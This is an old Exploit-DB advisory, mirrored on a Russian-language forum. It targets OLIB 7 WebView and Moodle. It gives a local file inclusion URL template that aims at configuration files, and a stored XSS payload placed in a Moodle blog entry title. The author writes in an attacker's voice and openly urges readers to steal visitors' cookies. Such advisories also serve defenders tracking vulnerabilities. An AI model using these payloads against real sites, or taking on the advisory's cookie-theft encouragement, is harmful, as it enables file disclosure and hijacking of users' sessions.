- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6653
- Проверка EDB
-
- Пройдено
- Автор
- ZEN
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-5678
- Дата публикации
- 2008-10-02
Код:
Security Advisory for 'OLIB 7 Webview'
This software is apart of Moodle.
Software - OLIB 7 WebView v2.5.1.1
Exploit - LFI
Severity - High
Author - ZeN
website - http://dusecurity.com/
Date - 2nd October 2008
DUSecurity Team / DarkCode
Exploit >
http://olib.site.com/cgi/?session=[session_key]&infile=[LFI]
files in dir - get_settings.ini, setup.ini(contains config file locations), text.ini
Info - You need to login to get a valid session key.
------------------
Extraz :
Moodle Permanent XSS
In Moodle blogging system, simply make a new blog entry with the title
<script>alert()</script>
Now everyone that visits the bloggins system with execute your XSS.
Go get some cookies =D
Enjoy!
------------------
Shouts :-
DUSecurity.com
DarkCode.me
Milw0rm.com
iWannaHack
WL-Group
# milw0rm.com [2008-10-02]
- Источник
- www.exploit-db.com